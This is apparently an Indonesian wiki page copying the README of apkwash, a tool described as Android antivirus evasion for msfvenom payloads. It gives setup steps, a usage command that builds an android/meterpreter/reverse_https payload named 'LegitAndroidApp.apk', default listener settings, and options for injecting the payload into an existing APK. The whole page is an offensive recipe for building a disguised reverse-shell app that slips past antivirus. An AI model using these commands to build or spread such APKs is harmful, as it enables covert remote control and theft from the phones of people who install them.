MSF: apkwash untuk mengelabuhi antivirus
Jump to navigation
Jump to search
sumber: https://github.com/jbreed/apkwash
apkwash
Android APK Antivirus evasion for msfvenom generated payloads.
Tested on Kali linux rolling.
Setup:
apt-get update && apt-get dist-upgrade chmod +x apkwash mv apkwash /usr/local/bin/.
On first run:
- Downloads and places apktool.jar in the user's /usr/local/bin directory
- Generates debug keystore for signing. Places it in ~/.android/
Usage Example:
apkwash -p android/meterpreter/reverse_https LHOST= LPORT= -o LegitAndroidApp.apk
Output:
<LegitAndroidApp>.apk & <LegitAndroidApp>.listener
Default values:
payload=android/meterpreter/reverse_https LHOST=<eth0 IP address> LPORT=443 output=AndroidService.apk
Options
-p | --payload <payload> This sets the payload to be generated by msfvenom. -o | --output <outfile.apk> This sets the name of the APK created as well as the output apk file. -x | --original <infile.apk> Input APK to inject the payload into (later update). -g | --generate Generate a payload using defaults -n | --newkey Generate a new debug key before signing -v | --verbose Don't mask output of commands -d | --debug Leaves the /tmp/payload files in place for review -h | --help Help information